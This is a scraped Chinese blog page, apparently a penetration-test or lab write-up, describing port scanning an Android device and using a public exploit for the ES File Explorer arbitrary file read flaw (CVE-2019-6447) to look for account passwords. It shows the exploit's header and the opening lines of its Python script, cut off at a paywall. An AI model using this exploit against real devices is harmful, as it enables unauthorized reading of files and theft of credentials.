利用“ES File Explore”服务的漏洞(任意文件读取漏洞)获取账号密码

最新推荐文章于 2023-04-25 15:59:41 发布

weixin_47156475

最新推荐文章于 2023-04-25 15:59:41 发布

阅读量930

点赞数

分类专栏： GetSheLL

本文链接：https://blog.csdn.net/weixin_47156475/article/details/119679406

版权

扫描发现只开放了2222跟5555端口，深入扫描一下
在这里插入图片描述

发现还开放了34687,42135跟59777端口，然后去寻找各个端口服务的漏洞
最后发现在42135端口存在“ ES File Explorer Name Response httpd”可利用漏洞，这个漏洞是任意文件读取漏洞，接下来就是通过这个漏洞去查找敏感文件，看看是否存在敏感信息，帮助我们getshell
最终在网上找到了一个有关“ ES File Explorer Name Response httpd”的exploit

# Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
# Date: 29/06/2021
# Exploit Author: Nehal Zaman
# Version: ES File Explorer v4.1.9.7.4
# Tested on: Android
# CVE : CVE-2019-6447

import requests
import json
import ast
import sys

if len(sys.argv) < 3:
    print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]")
    sys.exit(1)

url = 'http://' + sys.argv[2] + ':59777'
cmd = sys.ar

最低0.47元/天解锁文章

weixin_47156475

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
利用“ES File Explore”服务的漏洞(任意文件读取漏洞)获取账号密码

扫描发现只开放了2222跟5555端口，深入扫描一下发现还开放了34687,42135跟59777端口，然后去寻找各个端口服务的漏洞最后发现在42135端口存在“ ES File Explorer Name Response httpd”可利用漏洞，这个漏洞是任意文件读取漏洞，接下来就是通过这个漏洞去查找敏感文件，看看是否存在敏感信息，帮助我们getshell最终在网上找到了一个有关“ ES File Explorer Name Response httpd”的exploit# Exploit
复制链接

扫一扫